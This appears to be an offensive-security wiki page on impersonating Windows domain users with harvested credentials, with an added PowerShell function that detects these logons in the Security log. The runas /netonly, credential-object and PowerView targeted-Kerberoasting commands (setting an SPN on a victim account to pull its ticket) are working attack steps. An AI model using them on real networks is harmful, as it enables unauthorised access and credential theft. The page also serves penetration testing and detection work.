Impersonation
When credentials are found (through dumping or cracking for instance), attackers try to use them to obtain access to new resources. Depending on the harvested credential material type, the impersonation can be done in different ways.
RunAs

RunAs is a standard Windows command that executes a program under a different user account. When supplying an Active Directory account's password, the /netonly flag must be set to indicate that the credentials are to be used for remote (network) access only: the new process runs locally under the current user's token and only presents the supplied credentials when authenticating to remote resources.

```powershell
runas /netonly /user:$DOMAIN\$USER "powershell.exe"
```

Since the password cannot be supplied as an argument (runas prompts for it), the session must be interactive.
Powershell

In PowerShell, it is possible to impersonate a user by creating a credential object and supplying it through the -Credential parameter of a subsequent command.

```powershell
# Credential object creation (prompted)
$credential = Get-Credential

# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Start-Process Notepad.exe -Credential $credential
```
PowerView

Most of PowerView's functions have the -Credential, -Domain and -Server parameters, which can be used to explicitly specify the user to run as, the target domain and the target Domain Controller. Just like in the previous "Powershell" tab, the -Credential parameter has to be supplied with a credential object.

Here is an example for targeted Kerberoasting.

```powershell
# Credential object creation (not prompted)
$password = ConvertTo-SecureString 'password_of_user_to_run_as' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('FQDN.DOMAIN\user_to_run_as', $password)

# Usage
Set-DomainObject -Credential $credential -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' -Identity 'victimuser' -Set @{serviceprincipalname='nonexistant/BLAHBLAH'}
$User = Get-DomainUser -Credential $credential -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' 'victimuser'
$User | Get-DomainSPNTicket -Credential $credential -Domain 'FQDN.DOMAIN' -Server 'Domain_Controller' | fl
```
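As an added defensive example (not part of the original page, and not PowerView's or any other project's code), the function below hunts the local Security log for the artefacts that the RunAs and Powershell tabs above leave on the host they are run from: a 4624 event with LogonType 9 (NewCredentials), which is what "runas /netonly" produces, and a 4648 event ("logon attempted using explicit credentials"), which is what starting a process with -Credential produces. The function name, the lookback window and the ignore list are this example's own choices; it assumes an elevated session, since reading the Security log requires it.

```powershell
# Added example: find explicit-credential and NewCredentials logons on this host.
# Assumed: run from an elevated PowerShell session (Security log is admin-only).
function Get-ExplicitCredentialLogons {
    param(
        [int]$Hours = 24,
        # Accounts that legitimately generate 4648 noise (services, session managers,
        # machine accounts ending in '$'); constructed defaults, tune for your estate.
        [string[]]$IgnoreAccounts = @('SYSTEM', 'LOCAL SERVICE', 'NETWORK SERVICE', 'DWM-*', 'UMFD-*', '*$')
    )
    $since = (Get-Date).AddHours(-$Hours)

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Security'
        Id        = 4624, 4648
        StartTime = $since
    } -ErrorAction SilentlyContinue

    foreach ($e in $events) {
        # The structured fields live in the event XML; index them by their Name attribute.
        $xml  = [xml]$e.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

        $localUser   = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
        $usedAccount = "$($data.TargetDomainName)\$($data.TargetUserName)"

        if ($e.Id -eq 4624) {
            # Logon type 9 = NewCredentials: the caller keeps its own token locally and
            # uses the supplied credentials only for outbound network authentication,
            # which is exactly what "runas /netonly" asks for.
            if ($data.LogonType -ne '9') { continue }
            [pscustomobject]@{
                Time        = $e.TimeCreated
                EventId     = 4624
                Kind        = 'NewCredentials (runas /netonly-style)'
                LocalUser   = $localUser
                UsedAccount = $usedAccount
                Process     = $data.ProcessName
            }
        }
        elseif ($e.Id -eq 4648) {
            # Explicit credentials: a process supplied a username/password to start
            # another process or logon (Start-Process -Credential, runas, etc.).
            $target = $data.TargetUserName
            if ($IgnoreAccounts | Where-Object { $target -like $_ }) { continue }
            [pscustomobject]@{
                Time        = $e.TimeCreated
                EventId     = 4648
                Kind        = 'Explicit credentials'
                LocalUser   = $localUser
                UsedAccount = $usedAccount
                Process     = $data.ProcessName
            }
        }
    }
}

# Usage: list the last day of candidate events, oldest first.
Get-ExplicitCredentialLogons -Hours 24 | Sort-Object Time | Format-Table -AutoSize
```

Two caveats when reading the output. First, 4648 is noisy on any host running scheduled tasks or services under stored credentials, so the value is in the pairing of LocalUser (who was logged on) with UsedAccount (whose credentials were presented) and the originating Process, not in the event count. Second, the PowerView tab leaves little on the operator's host because the credentials are consumed by an LDAP bind rather than a local logon; the corresponding trace is on the Domain Controller, where the impersonated account appears in a 4624 network logon (LogonType 3) from the operator's address.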